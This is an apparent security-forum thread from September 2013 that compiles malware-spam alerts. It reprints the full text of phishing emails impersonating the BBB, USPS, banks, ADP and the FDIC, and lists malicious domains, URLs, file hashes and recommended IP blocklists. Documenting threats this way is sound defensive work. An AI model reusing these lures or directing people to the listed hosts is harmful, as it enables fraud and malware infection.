95.87.1.19
174.142.186.89 ..."
(More URLS listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=5071327

** http://wepawet.iseclab.org/view.php?hash=475d28a937b23a953b975e1f28ecf035&t=1378821965&type=js

- https://www.virustotal.com/en/ip-address/174.142.186.89/information/
___

Fake BBB SPAM / Case_0938818_2818.exe
- http://blog.dynamoo.com/2013/09/bbb-spam-case09388182818exe.html
10 Sep 2013 - "This fake BBB spam has a malicious attachment:
Date: Tue, 10 Sep 2013 15:07:14 +0100 [10:07:14 EDT]
From: Better Business Bureau [Aldo_Austin@ newyork .bbb .org]
Subject: FW: Case IN11A44X2WCP44M
The Better Business Bureau has received the above-referenced complaint from one of your
customers regarding their dealings with you. The details of the consumer's concern are
included on the reverse. Please review this matter and advise us of your position.
As a neutral third party, the Better Business Bureau can help to resolve the matter.
Often complaints are a result of misunderstandings a company wants to know about and
correct.
In the interest of time and good customer relations, please provide the BBB with written
verification of your position in this matter by September 13, 2013. Your prompt response
will allow BBB to be of service to you and your customer in reaching a mutually agreeable
resolution. Please inform us if you have contacted your customer directly and already
resolved this matter.
The Better Business Bureau develops and maintains Reliability Reports on companies across
the United States and Canada . This information is available to the public and is
frequently used by potential customers. Your cooperation in responding to this complaint
becomes a permanent part of your file with the Better Business Bureau. Failure to
promptly give attention to this matter may be reflected in the report we give to
consumers about your company.
We encourage you to print this complaint (attached file - Case_IN11A44X2WCP44M), answer
the questions and respond to us.
We look forward to your prompt attention to this matter.
Sincerely,
Aldo_Austin
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201

Attached to the message is a ZIP file Case_IN11A44X2WCP44M.zip which in turn contains an executable Case_0938818_2818.exe which has a shockingly low detection rate of just 1/46* at VirusTotal. Automated analysis of the malware is inconclusive... but it does generate outbound traffic to kwaggle .com port 443 on 64.50.166.122 (Lunar Pages, US). The domain thisisyourwife .co .uk on the same server is also hosting malware, I would therefore be suspicious about some of the other sites on the same box.
Recommended blocklist:
64.50.166.122
kwaggle .com
thisisyourwife .co .uk "
* https://www.virustotal.com/en-gb/file/dac2e647bbeadaa7b33ef264f2cbf43d9f3469533b42bc12c9d2e9d4e5d1046c/analysis/1378823569/

- https://www.virustotal.com/en/ip-address/64.50.166.122/information/

:fear::mad:

AplusWebMaster
2013-09-11, 18:43
FYI...

Threats - Online Bullying ...
- http://www.threattracksecurity.com/it-blog/ask-fm-threats-go-beyond-online-bullying/
Sep 11, 2013 - "Three weeks ago... co-founders of social networking site Ask.fm, released a statement regarding some changes on the site’s safety policy in an effort to curb the dramatic increase of cyberbullying occurrences within its platform. Ask.fm boasts at least 57 million registered users, majority of which are teens and tweens. The site’s anonymity feature has sadly become the means for some users to deliberately target and verbally assault others. The proposed changes are no quick fix, nor are they remedies to the deeper problems of what motivates one to bully someone online. However, I believe that it’s a good first step to achieve the objective. Giving users the option to opt out of accepting and entertaining anonymous questions and/or comments could be a big blow to trolls. Some victims of online bullying in Ask.fm have taken upon themselves to resolve the matter of anonymity by attempting to unmask who these people are. How? They look for tools online... that will lead to trouble... We have come across a number of sites hosting files that -pretend- to unmask Ask.fm users. Upon closer inspection, however, they’re malicious in nature at worse. These files can range from simple malware droppers to Bitcoin miners to PUPs bearing a gamified marketing tactic or something more dubious.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/06A8F73D66FA9256970848DFA6ABA7AD.jpg
Sadly, such files like the above are easy to find. Users who find themselves installing -any- of these files on their computer will discover that they got something more than what they bargained for..."
___

Fake USPS SPAM / Label_FOHWXR30ZZ0LNB1.zip
- http://blog.dynamoo.com/2013/09/usps-spam-labelfohwxr30zz0lnb1zip.html
11 Sep 2013 - "This fake USPS spam has a malicious attachment:
Date: Wed, 11 Sep 2013 11:19:05 -0500 [12:19:05 EDT]
From: USPS Express Services [service-notification @usps .com]
Subject: USPS - Missed package delivery
Priority: High Priority 1 (High)
Notification
Our company's courier couldn't make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: Sort Order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: UGLFOHWXR30ZZ0LNB1
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global...

There is an attachment Label_FOHWXR30ZZ0LNB1.zip which in turn contains an executable Label_368_09112013_JDSL.exe which has a very low detection rate at VirusTotal of just 2/47*.... attempted connection to a -hijacked- GoDaddy domain drippingstrawberry .com hosted on 64.50.166.122 (LunarPages, US) with quite a lot of other hijacked domains. Blocking or monitoring traffic to this IP could stop the infection, URLquery shows** some of the things going on with this server.
Recommended blocklist:
64.50.166.122 ..."
(More URLs listed at the dynamoo URL above.)
* https://www.virustotal.com/en/file/e895123dfed32e5855c2d91f3f9d6410633b84020bead54086f47ce687a5e70a/analysis/1378926663/

** http://urlquery.net/search.php?q=64.50.166.122&type=string&start=2013-08-27&end=2013-09-11&max=50

- https://www.virustotal.com/en/ip-address/64.50.166.122/information/
___

Xerox WorkCentre Pro SPAM
- http://threattrack.tumblr.com/post/60947146663/xerox-workcentre-pro-spam
Sep 11, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.
Sent by: <e-mail domain>
Number of Images: 3
Attachment File Type: ZIP [PDF]
WorkCentre Pro Location: Machine location not set
Device Name:
Attached file is scanned image in PDF format.

Malicious File Name and MD5:
Scan_<random>.zip (1BE34606E5B1D54C5E394982A3DD8965)
scanned_doc_<date>.exe (2E318671CEC024166586943AD04520C1)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a1d06659e9d1e04299fc707dcb569734/tumblr_inline_msz3pw9f951qz4rgp.png
___

Fake AVG Android Apps ...
- http://blogs.avg.com/mobile-2/examples-fake-avg-android-apps/
Sep 9, 2013 - "Our mobile security research team has found at least 33 applications that contain aggressive advertising components in the official Google Play store. The developers of these applications choose to imitate well-known companies like Google, Microsoft, Twitter, AVG among others. Here’s an example of some applications found in Google Play:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-11.png
... Below you can see another example of a -fake- AVG anti-virus app that can be found in Google Play:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-6.png
Remember, if you want to pay for a PRO version of an app, you absolutely must make sure that it is the legitimate version of the app you’re looking for... When you install one of these fake applications, it requests the user to change configurations related to the search options:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-31.png
After the user accepts the conditions, commericals for adult services are shown:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-4.png
Later, the app itself offers none of the functionality advertised (such as antivirus protection). This is a new advertising vector that takes advantage of people who might not be familiar with official company accounts... when you look for AVG’s Android solutions on Google Play you might find apps that are -not- released by AVG (the official developer is AVG Mobile) but from opportunistic scammers..."

- http://www.fireeye.com/blog/technical/2013/09/android-malware.html
Sep 10, 2013 - "... Before the advent of advanced malware, we used to see a bunch of fake AV on the windows platform... the same thing will happen in the case of Android malware, where eventually we will start seeing more serious and advanced techniques being employed in mobility. To protect yourself from malicious Android applications, please follow these simple steps:
1. Disable the “Allow installation of apps from Unknown Sources” setting.
2. Always install apps from trusted app markets."

:mad: :sad:

AplusWebMaster
2013-09-12, 22:34
FYI...

Fake QuickBooks SPAM / Invoice_20130912.zip
- http://blog.dynamoo.com/2013/09/quickbooks-spam-invoice20130912zip.html
12 Sep 2013 - "This fake QuickBooks spam has a malicious attachment:
Date: Thu, 12 Sep 2013 20:29:17 +0200 [14:29:17 EDT]
From: QuickBooks Invoice [auto-invoice@ quickbooks .com]
Subject: Important - Payment Overdue
Please find attached your invoices for the past months. Remit the payment by 09/16/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Quentin Sprague ...

The attachment is Invoice_20130912.zip which in turn contains a malicious executable Invoice_20130912.exe (note the date is encoded into the filename). The detection rate at VirusTotal is just 3/46*... the file attempt to communicate with the domain leightongriffiths .com on an apparently compromised server at 64.50.166.122 which has been seen before. Given that there are now several domains serving malware on the same server**... it is probably safe to assume that all the domains on that server are malicious and should be blocked.
Recommended blocklist:
64.50.166.122 ..."
* https://www.virustotal.com/en/file/5ac94782513f480dec9c6661559aedcf88ed67f812abc716ad52285e28f75234/analysis/1379012535/

** https://www.virustotal.com/en/ip-address/64.50.166.122/information/
___

Fake Online Message - Mint Internet Banking
- http://security.intuit.com/alert.php?a=86
9/12/13 - "People are receiving fake emails with the title "Online Message from Mint Internet Banking' ...
> http://security.intuit.com/images/mint.jpg
... This is the end of the fake email.
Steps to Take Now
Do not open the attachment in the email...
Delete the email..."
___

Fake AV and PRISM warning on hijacked website
- http://research.zscaler.com/2013/09/fake-av-and-prism-warning-on-hijacked.html
Sep 9, 2013 - "While many individuals are concerned about privacy in light of PRISM, some malicious actors are using the program to scare naive users into installing ransomware. Since August 23rd, we have seen about 20 domains that carry FakeAV and Ransomware. These websites seem to have been hijacked. They are all hosting the malicious content over port 972 and use similar URL patterns. Here are a couple examples:
kringpad.websiteanddomainauctions .com:972/lesser-assess_away-van.txt?e=20
miesurheilijaaantidiabetic.conferencesiq .com:972/realism_relinquish-umbrella-gasp.txt?e=21
squamipi.worldcupbasketball .net:972/duty_therefore.txt?e=21
The malicious files seem to be changing. It started with the classic FakeAV, then switched to a fake PRISM warning. In both cases, the goal is to scare the target into paying the attacker to "fix" their computer... FakeAV remains a popular technique to lure targets into paying attackers...
- FakeAV scan of the computer
> https://lh3.ggpht.com/-XH8fcTYMAPQ/Uio9HCB6IfI/AAAAAAAAsyI/batvgm9HvrA/s1600/fakeav-2103-1.jpeg
- FakeAV claims to have found threats
> https://lh3.ggpht.com/-4jJX3X52nRw/Uio9QYzv6JI/AAAAAAAAsyQ/_7SEkFXS0gw/s1600/fakeav-2013-2.jpeg
The scan claims to have found 18 threats. Two have been cured, but the victim must -pay- to get the remaining 16 threats taken care of...
PRISM warning... The attacker uses the recent news about PRISM to claim that the victim's computer has been blocked because it accessed illegal pornographic content. The victim has to pay $300 through MoneyPak, a prepaid card service...
- No less than 5 federal agencies are "blocking" your computer!
> https://lh3.ggpht.com/-_QJ4pSmyYqw/UipBeh9bnLI/AAAAAAAAsyo/oiQcSHvEc3o/s320/prism-1.jpeg
- Victim needs to pay up $300 to get his computer back.
> https://lh3.ggpht.com/-C4h73XCNJLM/UipB1WzBmZI/AAAAAAAAsyw/ZnFGY7A9BUs/s1600/prism-2.jpeg
Both malware connect to the same couple of IP addresses over ports 80 and 443 that include:
37.139.53.199
64.120.167.162
64.191.122.10
I expect attackers to take advantages of the upcoming UK laws on accessing adult content online to send new types of fake warnings to UK victims."

:fear: :mad::mad:

AplusWebMaster
2013-09-16, 18:47
FYI...

Fake Walls Fargo SPAM- / WellsFargo - Important Documents.zip
- http://blog.dynamoo.com/2013/09/walls-fargo-spam-wellsfargo-important.html
16 Sep 2013 - "This fake Wells Fargo spam has a malicious attachment:
Date: Mon, 16 Sep 2013 09:26:51 -0500 [10:26:51 EDT]
From: Harrison_Walsh @ wellsfargo .com
Subject: IMPORTANT Documents - WellsFargo
Please review attached documents.
Harrison_Walsh
Wells Fargo Advisors
817-674-9414 office
817-593-0721 cell Harrison_Walsh @wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

Attached is a ZIP file called WellsFargo - Important Documents.zip which in turn contains a malicious executable WellsFargo - Important Documents.exe which has a very low VirusTotal rate of 2/47*. Automated analysis tools... detect network traffic to [donotclick]www .c3dsolutions .com hosted on 173.229.1.89 (5Nines LLC, US). At present I do not have any evidence of further malware sites on that server."
* https://www.virustotal.com/en/file/d4b16269c9849c33a7bb2fdc782173a00e99db12a585689618dde3f4c6fcb101/analysis/1379342203/
___

ZeuS/ZBOT: Most Distributed malware by Spam in August
- http://blog.trendmicro.com/trendlabs-security-intelligence/zeuszbot-most-distributed-malware-by-spam-in-august/
Sep 16, 2013 - "... resurgence of online banking malware, in particular the increase of ZeuS/ZBOT variants during the quarter. While ZeuS/ZBOT has been around for some times, its prevalence shows that it is still a big threat to end users today. For the month of August, 23% of spam with malicious attachments were found carrying ZeuS/ZBOT variants, while 19% served FAREIT variants. ZeuS/ZBOT variants also had the distinction of being the most distributed malware by IPs related to spam botnets. It is also associated with various worm families that can spread itself or other malware families via email. A system infected with ZeuS/ZBOT may be infected about five other worm variants like WORM_MYDOOM, WORM_VB, and WORM_BAGLE...
Malware families spread by spam
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/Zeus-spam-percentage.jpg
... the majority of spam carrying either ZeuS/ZBOT or FAREIT looked more like legitimate messages, and were likely to supposedly come from well-known brands or companies.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/Spoofed-email-fareit-254x300.jpg
Once installed, Zeus/ZBOT variants are known to monitor users’ browsing behavior pertaining to visits to specific online banking sites. If users visit these sites and tries to login using their credentials, the malware inject additional field for users to fill out and then steal these information. Cybercriminals can then use these stolen data to either initiate unauthorized transactions or sell in the underground market. FAREIT is another data-stealing malware that gathers emails and FTP login credentials. This malware can also download other malware variants, including Zeus/ZBOT..."
___

Fake eFax SPAM / rockims .com
- http://blog.dynamoo.com/2013/09/efax-spam-rockimscom.html
16 Sep 2013 - "This fake eFax spam leads to malware on rockims .com:
Date: Mon, 16 Sep 2013 22:43:06 +0400 [14:43:06 EDT]
From: eFax Corporate [message@ inbound .efax .com]
Subject: Corporate eFax message - 1 pages
Warning: This message may not be from whom it claims to be. Beware of following any links in it or of providing the sender with any personal information.
Fax Message [Caller-ID: 854-349-9584]
You have received a 1 pages fax at 2013-16-09 01:11:11 CST.
* The reference number for this fax is latf1_did11-1237910785-2497583013-24.
View this fax using your PDF reader.
Click here to view this message ...
Thank you for using the eFax service! ...

Screenshot: https://lh3.ggpht.com/-g0-MrOF8Xvw/UjdWvoTurOI/AAAAAAAAB84/BQAkE0cb-dM/s1600/efax.png

The link in the email goes through a legitimate hacked site and then runs one of the following three scripts:
[donotclick]die-web-familie.homepage.t-online .de/quasar/monte.js
[donotclick]dim-kalogeras-ka-lar.schools .ac .cy/initials/casanovas.js
[donotclick]ade-data .com/exuded/midyear.js
These then lead to a malware payload at [donotclick]rockims .com/topic/seconds-exist-foot.php which is a -hijacked- GoDaddy domain hosted on 192.81.133.143 (Linode, US) along with quite a few other hijacked domains...
Recommended blocklist:
192.81.133.143 ..."
(More URLs listed at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/192.81.133.143/information/

:mad::fear:

AplusWebMaster
2013-09-17, 17:15
FYI...

Amazon Gift Card -phish- ...
- http://www.threattracksecurity.com/it-blog/50-amazon-gift-card-phish-makes-use-of-data-uri-technique/
Sep 17, 2013 - "Be wary of emails landing in mailboxes claiming to offer up “complimentary £50 gift cards” from Amazon. The mails, which claim to come from redeemATamazon(dot)co(dot)uk...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/amazonfakemail1.jpg
The mails are nice and professional looking, and the only real giveaway is that hovering over the “Redeem gift card” button displays a Tinyurl link -instead- of the expected Amazon URL... Clicking the Tinyurl link takes end-users to a very nice looking set of pages designed to offer up the so-called gift card, then extract personal information including cc number and name / address / dob... Once end-users have selected their card design, they’re suddenly informed that “Our constant security review has shown us that your account has been inactive. Please confirm your updated card information below. Once your details have been confirmed with our system, we will then post your free gift card to you” …along with a message that their card has expired and a billing information update is required... The concept of using this in a phish attack has been around for a while, but it isn’t too often you come across them... Amazon themselves list a lot of scam types on their Security & Privacy page* so you may want to familiarise yourselves with those. As always, if it sounds too good to be true then it probably is..."
* http://www.amazon.co.uk/gp/help/customer/display.html/ref=help_search_1-1?ie=UTF8&nodeId=492866&qid=1370954895&sr=1-1
___

Fake ADP SPAM / ADP_831290760091.zip
- http://blog.dynamoo.com/2013/09/adp-spam-adp831290760091zip.html
17 Sep 2013 - "This fake ADP spam has a malicious attachment:
Date: Tue, 17 Sep 2013 20:32:04 +0530 [11:02:04 EDT]
From: ADP ClientServices
Subject: ADP - Reference #831290760091
Priority: High Priority 1 (High)
We were unable to process your recent transaction. Please verify your details and try again.
If the problem persists, contact us to complete your order.
Transaction details are shown in the attached file.
Reference #831290760091
This e-mail has been sent from an automated system.
PLEASE DO NOT REPLY...

Attached to the email is a file called ADP_831290760091.zip which in turn contains ADP_Reference_09172013.exe which has a VirusTotal detection rate of 9/48*. Automated analysis [1] [2] [3] shows a connection attempt to awcoomer .com on 78.157.201.219 (UK Dedicated Servers Ltd, UK). I don't have any evidence of further infections on this server, it does host 30+ legitimate UK sites if that helps.."
* https://www.virustotal.com/en-gb/file/333342d7e7790daee364f7da003a8c690550df12647ccb72a022bd70bf2285ae/analysis/1379432239/

1) https://malwr.com/analysis/MDM2MmVmYThiMzAwNGE4OGIyOTlmZjEyODIzZjE5YTI/

2) http://camas.comodo.com/cgi-bin/submit?file=333342d7e7790daee364f7da003a8c690550df12647ccb72a022bd70bf2285ae

3) http://anubis.iseclab.org/?action=result&task_id=118929c3bd33d5cf4558fb39a8199c677&format=html
___

FedEx spam FAIL
- http://blog.dynamoo.com/2013/09/fedex-spam-fail.html
17 Sep 2013 - "This fake FedEx spam is presumably -meant- to have a malicious payload:
Date: Tue, 17 Sep 2013 13:02:25 +0000 [09:02:25 EDT]
From: webteam@ virginmedia .com
Subject: Your Rewards Order Has Shipped
Headers: Show All Headers
This is to confirm that one or more items in your order has been shipped. Note that multiple items in an order may be shipped separately.
You can review complete details of your order on the Order History page
Thanks for choosing FedEx.
Order Confirmation Number: 0410493
Order Date: 09/15/2013
Redemption Item Quantity Tracking Number
Paper, Document 16 <
fedex.com Follow FedEx:
You may receive separate e-mails with tracking information for reward ordered...

Screenshot: https://lh3.ggpht.com/--53hJkHQbuU/Ujh2GyxXzbI/AAAAAAAAB9Q/8HFvlXVNoHM/s1600/fedex.png

Presumably there is meant to be a malicious link or attachment, but there isn't. However, the bad guys will probably use the same template again with a WORKING payload, so please take care."
___

FDIC Spam
- http://threattrack.tumblr.com/post/61500209698/fdic-spam
Sep 17, 2013 - "Subjects Seen:
FDIC: About your business account
FDIC: Your business account
Typical e-mail details:
Dear Business Customer,
We have important information about your bank.
Please View to view detailed information.
This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership

Malicious URLs
data.texosn .ru/insurance.problem.html
no-mice .ru/insurance.problem.html
fdic.gov.horse-mails .net/news/fdic-insurance.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/67c51721046f2bb32a14ba2919e3a939/tumblr_inline_mt9y7xPKjB1r6pupn.png

- http://blog.dynamoo.com/2013/09/fdic-spam-horse-mailsnet.html
17 Sep 2013 - "This fake FDIC spam leads to malware on www .fdic.gov.horse-mails .net:
Date: Tue, 17 Sep 2013 15:28:52 +0330 [07:58:52 EDT]
From: insurance.coverage@ fdic .gov
Subject: FDIC: About your business account
Dear Business Customer,
We have important news regarding your financial institution.
Please View to see further details.
This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership
FDÌC Questions for FDÌC?
Contact Us...
Federal Insurance Company · 3501 Fairfax Drive · Arlington VA 22225 ...

Screenshot: https://lh3.ggpht.com/-YGld7C9xZtw/Ujh69VMQLsI/AAAAAAAAB9g/15BqbI3D7QM/s1600/fdic.png

The link goes through a legitimate -hacked- site and onto a malware landing page at [donotclick]www.fdic.gov.horse-mails .net/news/fdic-insurance.php which belongs to the Amerika gang and is hosted on the following IPs...:
37.221.163.174 (Voxility S.R.L., Romania)
95.111.32.249 (Megalan / Mobiltel EAD, Bulgaria)
109.71.136.140 (OpWan SARL, France)
174.142.186.89 (iWeb Technologies, Canada)
216.218.208.55 (Hurricane Electric, US) ...
new feature (pictured below)
> https://lh3.ggpht.com/-IXC9yHDKq48/Ujh85gQNIRI/AAAAAAAAB9s/nryohN6ihzQ/s1600/os-detection.png
Recommended blocklist...:
37.221.163.174
95.111.32.249
109.71.136.140
174.142.186.89
216.218.208.55 ..."

:fear: :mad:

AplusWebMaster
2013-09-21, 15:50
FYI...

Ajax Oracle Quotation Spam
- http://threattrack.tumblr.com/post/61803135323/ajax-oracle-quotation-spam
Sep 20, 2013 - "Subjects Seen:
my subject
Typical e-mail details:
Dear Sir/Madam
I am the Purchase Manager of AJAX ORACLE TRADING COMPANY LTD.We are a
major trading company located in Ontario Canada.
We are interested in purchasing your products as exactly shown in the DATA
SHEET as attached in this mail. Please check and get back to us as soon as
possible with your last price, payment terms and delivery time.
Your response will be highly appreciated.
Sincerely Yours.
Danny Davies
Sales Department
Ajax Oracle Trading Co.Ltd

Malicious File Name and MD5:
Quotation.zip (85E02878328919ABE4BB01FDEBD90E6)
Quotation.scr (3B56864260399FBB0259F817749E959C)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7365813051d152bf0f4f625b390fc6a2/tumblr_inline_mtg9dazzKD1r6pupn.png
___

WhatsApp "3 New Voicemail(s)" spam and 219.235.1.127
- http://blog.dynamoo.com/2013/09/whatsapp-3-new-voicemails-spam-and.html
20 September 2013 - "I am indebted to Gary Warner for his analysis* of this malware... This malware is particularly cunning...
> https://lh3.ggpht.com/-b6Aj4avuPQc/Ujy7tgfwSwI/AAAAAAAAB-Q/Q1ADawDWL6s/s1600/whatsapp.png
... it is possible that clicking the link installs the malware without asking on certain devices. The VirusTotal score for this .apk is a pretty health 21/48**, but who runs anti-virus software on their Android?... the application certainly seems to send traffic to 219.235.1.127 (Shanghai QianWan Network, China) which is probably a darned good candidate for blocking (if you can). This IP has been spotted with PC-based fake AV programs before... Although mobile malware is getting more common, this is the first time that I have seen an attack like this. All smartphone and tablet users need to be aware of the very real risks of malware on thier devices and should take the appropriate steps to keep themselves safe."
(More detail at the dynamoo URL above.)
* http://garwarner.blogspot.com/2013/09/fake-av-malware-hits-android.html

** https://www.virustotal.com/en/file/1d5390ff7fa9e813d47e12a2137dc5f67df12212196e614ec9f72ba6bbb85535/analysis/1379711360/
___

Shylock Financial Malware Back and Targeting Two Dozen Major Banks
- https://atlas.arbor.net/briefs/index#-1822006250
Elevated Severity
September 20, 2013 21:24
The Shylock banking trojan malware, also known as Caphaw, is active and targeting at least twenty-four banking institutions.
Analysis: Shylock has "man in the browser" capabilities whereby it takes over the users system during banking transactions to commit fraud. As the fraud comes from the authorized user from the authorized system, the deviceprint is no longer a useful indicator of malicious activity. Shylock is increasing in popularity and is now aimed at more targets. Previously, it had a smaller number of regional targets.
Source: http://threatpost.com/shylock-financial-malware-back-and-targeting-two-dozen-major-banks/102343
"... researchers provided the list of 24 banks being targeted..."
___

Beta Bot malware blocks users A/V ...
- http://www.ic3.gov/media/2013/130918.aspx
Sep 18, 2013 - "The FBI is aware of a new type of malware known as Beta Bot. Cyber criminals use Beta Bot to target financial institutions, e-commerce sites, online payment platforms, and social networking sites to steal sensitive data such as log-in credentials and financial information. Beta Bot blocks computer users’ access to security websites and disables anti-virus programs, leaving computers vulnerable to compromise. Beta Bot infection vectors include an illegitimate but official looking Microsoft Windows message box named “User Account Control” that requests a user’s permission to allow the “Windows Command Processor” to modify the user’s computer settings. If the user complies with the request, the hackers are able to exfiltrate data from the computer. Beta Bot is also spread via USB thumb drives or online via Skype, where it -redirects- the user to compromised websites...
> https://www.ic3.gov/images/130918.png
Although Beta Box masquerades as the “User Account Control” message box, it is also able to perform modifications to a user’s computer. If the above pop-up message or a similar prompt appears on your computer and you did not request it or are not making modifications to your system’s configuration, do not authorize “Windows Command Processor” to make any changes.
Remediation strategies for Beta Bot infection include running a full system scan with up-to-date anti-virus software on the infected computer. If Beta Bot blocks access to security sites, download the latest anti-virus updates or a whole new anti-virus program onto an uninfected computer, save it to a USB drive and load and run it on the infected computer. It is advisable to subsequently re-format the USB drive to remove any traces of the malware."
- https://atlas.arbor.net/briefs/index#64584071
Title: FBI Warning Users About Beta Bot Malware
Published: Fri, 20 Sep 2013 21:24:05 +0000
The Beta Bot malware has caught the attention of the FBI, who have issued a warning bulletin.
___

Backdoor installed via Java 6 exploit...
- http://blog.trendmicro.com/trendlabs-security-intelligence/blypt-a-new-backdoor-family-installed-via-java-exploit/
Sep 20, 2013 - "... this backdoor is installed using Java exploits; either drive-by downloads or compromised web sites may be used to deliver these exploits to user systems. This affects unsupported Java 6 users, meaning they’re at -extreme- risk since no patch will be available. Our research shows that the servers behind these attacks are mainly centered in Romania and Turkey. Currently, this threat is primarily hitting users in the United States; however it seems that consumers (as opposed to businesses) are the most affected... we found a Java exploit that was used to spread this attack. This particular exploit, detected as JAVA_EXPLOYT.HI, can be used to run arbitrary code. It exploits a vulnerability, CVE-2013-1493*, that has been exploited since February 2013. It was patched in March... The installer attempts to connect to three servers every 3 seconds, until it successfully downloads the backdoor component. If it fails, it will retry up to 32 times before it gives up... it provides instant feedback on the status of the install by accessing a URL on the malicious server, which actually serves as a status report..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493 - 10.0 (HIGH)
Last revised: 08/22/2013

:mad: :fear:

AplusWebMaster
2013-09-23, 21:41
FYI...

Fake FDIC emails serve client-side exploits and malware ...
- http://www.webroot.com/blog/2013/09/23/spamvertised-fdic-business-account-themed-emails-server-client-side-exploits-malware/
Sep 23rd, 2013 - "Cybercriminals are mass mailing tens of thousands of malicious Federal Deposit Insurance Corporation (FDIC) themed emails, in an attempt to trick users into clicking on the client-side exploits serving and malware dropping URLs found in the bogus emails...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/09/FDIC_Email_Spam_Spam_Campaign_Spamvertised_Malware_Malicious_Software_Exploits_Social_Engineering.png
Sample redirection chain: hxxp ://stranniki-music .ru/insurance.problem.html (62.173.142.30) -> hxxp ://www.fdic .gov.horse-mails .net/news/fdic-insurance.php (174.142.186.89; 216.218.208.55; 109.71.136.140; 37.221.163.174; 95.111.32.249) Email: comicmotors@ writeme .com ... MD5 for a sample served client-side exploit: MD5: 92897ad0aff69dee36dc22140bf3d8a9*. Sample MD5 for the dropped malware: MD5: 7b6332de90e25a5b26f7c75910a22e0c**. Once executed, the sample phones back to... C&C servers..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/b34459b573637cb5e6fc938f989a24d79d0b83e9cb3fac272e5f7ecaad90519a/analysis/
Detection ratio: 28/48
** https://www.virustotal.com/en/file/07e7008fe60355714115364ad774b553b92d3515c2a810c2299f394c39d5f652/analysis/
Detection ratio: 9/48
___

FBI Ransomware forcing child porn on infected computers
- http://www.webroot.com/blog/2013/09/23/threatvlog-episode-6-fbi-ransomware-forcing-child-porn-infected-computers/
Sep 23, 2013 - "... new, very malicious form of FBI Ransomware that forces the users of infected machines to look at illegal imagery, taking the scare tactics to the next level..."
Video 2:27: https://www.youtube.com/embed/FAoRSLvtkA4
___

LinkedIn Invitation Spam
- http://threattrack.tumblr.com/post/62068030698/linkedin-invitation-spam
Sep 23, 2013 - "Subjects Seen:
Invitation to connect on LinkedIn
Typical e-mail details:
<removed> wants to connect with you on LinkedIn.

Malicious URLs
67.215.196.13 /images/wp-gdt.php?x1MVGHILHO0IT6347
exitdaymonthyear .biz/closest/i9jfuhioejskveohnuojfir.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3f99bf146a26fce1803ff953fd9d26ab/tumblr_inline_mtl6hnaHBA1r6pupn.png

- https://www.virustotal.com/en/ip-address/67.215.196.13/information/

Tagged: Blackhole, Sirefef, LinkedIn

:mad: :fear:

AplusWebMaster
2013-09-24, 16:58
FYI...

Fake DivX plug-in leads to Malware ...
- http://www.threattracksecurity.com/it-blog/fake-divx-plug-leads-picture-popping-malware/
Sep 23, 2013 - "Fans of semi-humorous Internet videos be warned: there’s a batch of files doing the rounds which pretend to be image files acting as DivX plug-ins... Sites pushing the files will claim you have the wrong type of DivX Plugin installed, with a new one being required to view the content. The first port of call (now replaced by a page-full of Javascript which we’re taking a look at) is / was located at sjsinternational(dot)com/shirleen
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/fbdivx1.jpg
“DivX plug-in required!
You don’t have the plugin required to view the video
Save the video and run it locally”
A rogue file – which appears to have been compiled in Russia – will be offered up to the end-user, typically offering up filenames that suggest photographs of a lewd and / or salacious nature. The files come from a .ua URL... one of the oldest tricks in the book is being used here – all the files claim to be gifs, jpegs and tif files, when they are (of course) anything but. Elsewhere on the same domain, we have a page which claims “You need to download and execute the Facebook app to see it! It’s amazing!” with yet another file being offered up. This page is still active, and located at sjsinternational(dot)com/marguerite.html
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/fbdivx2.jpg
... various URLs serving up the Malware have been very busy... More often than not, “Run this file to see a picture” results in no pictures and lots of files (bad ones, at that). This one is at least a little bit unusual if only because the end-user receives a (not very impressive) “reward” at the end of the hoop jumping. However, that reward comes loaded with Malware and should be avoided at all costs, whether posing as image files, Facebook apps or anything else you care to mention."
___

Fake Wire Transfer SPAM / INTL_Wire_Report-09242013.zip
- http://blog.dynamoo.com/2013/09/international-wire-transfer-spam.html
24 Sep 2013 - "This fake wire transfer spam has a malicious attachment:
Date: Tue, 24 Sep 2013 10:54:32 -0700 [13:54:32 EDT]
From: Wells Fargo Event Messaging Admin [ofsrep.ceoemigw@ wellsfargo .com]
Subject: International Wire Transfer File Not Processed
We are unable to process your International Wire Transfer request due to insufficient funds in the identified account.
